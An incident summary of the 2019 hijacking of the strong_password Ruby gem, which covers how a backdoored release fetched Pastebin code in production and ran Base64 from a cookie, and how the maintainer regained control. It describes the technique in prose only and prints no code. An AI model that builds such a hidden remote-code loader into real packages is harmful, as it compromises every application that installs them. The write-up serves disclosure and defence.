strong_password Ruby gem backdoor stole secrets

strong_password was compromised before the rest-client incident but exposed the same failure mode. Attackers published version 0.0.7 under the legitimate RubyGems name while the GitHub repository still showed no corresponding project change. The new RubyGems owner appeared as a sparse account named kickball, not the known maintainer.

Tute Costa found the mismatch while reviewing dependency updates. The malicious code had been appended to lib/strong_password/strength_checker.rb; it started a thread, waited a random interval, fetched Ruby from Pastebin, and evaluated it only when Rails.env[0] == "p".

The fetched payload inserted a Rack middleware hook that evaluated Base64 from a crafted ___id cookie. It also phoned home with host URL data. A password-strength library has no reason to read cookies or fetch executable code, but once loaded into Rails it runs inside the application process.

The maintainer confirmed the bogus 0.0.7 release was created on June 25, 2019 and that he no longer had ownership in RubyGems. RubyGems yanked the release, locked the publishing account used for the attack, and restored the maintainer. A few days later, the maintainer said the likely path was an old reused RubyGems password exposed in an unrelated breach. After regaining control, he removed kickball as an owner, reset the account with a unique password and MFA, and published 0.0.8 as the clean release users should move to.

Motive

Credential Theft

Attribution

Person

Cause

Compromised Account Credentials

Transitive

No

Actor

Individual Hacker

• CVE-2019-13354: strong_password embedded malicious codesonatype.com
• strong_password v0.0.7 rubygem hijackedwithatwist.dev
• strong_password maintainer comment on the RubyGems account takeovernews.ycombinator.com
• Code execution back door found in Ruby's rest-client librarysnyk.io
• Backdoored Ruby gems stole credentials, injected cryptomining codehelpnetsecurity.com